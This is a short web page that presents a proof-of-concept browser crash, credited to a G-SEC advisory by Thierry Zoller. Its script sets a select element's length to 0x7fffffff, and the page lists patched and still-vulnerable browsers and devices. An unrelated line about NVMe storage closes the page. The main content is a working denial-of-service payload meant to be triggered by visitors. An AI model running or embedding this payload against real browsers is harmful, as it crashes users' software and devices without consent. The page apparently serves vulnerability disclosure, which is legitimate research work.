Crash This Thing Homepage

POC of Bug

<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}

function go() {
poc(0);
}
</script>


Reference : [GSEC-TZO-26-2009] - One bug to rule them all

WWW : G-SEC
Credit : Thierry Zoller
Root Cause : Design bug (non clamped)
Browser will allocate huge chunks of memory and then most likely crash.
Known patches: Firefox, Chrome, Safari, Opera
Still vulnerable : IE5, IE6, IE7, IE8, WII, PS3, Nokia, Blackberry, Konqueror
Click "Select.lenght 0x7fffffff"

Our favorite storage with high IOPs: nvme ssd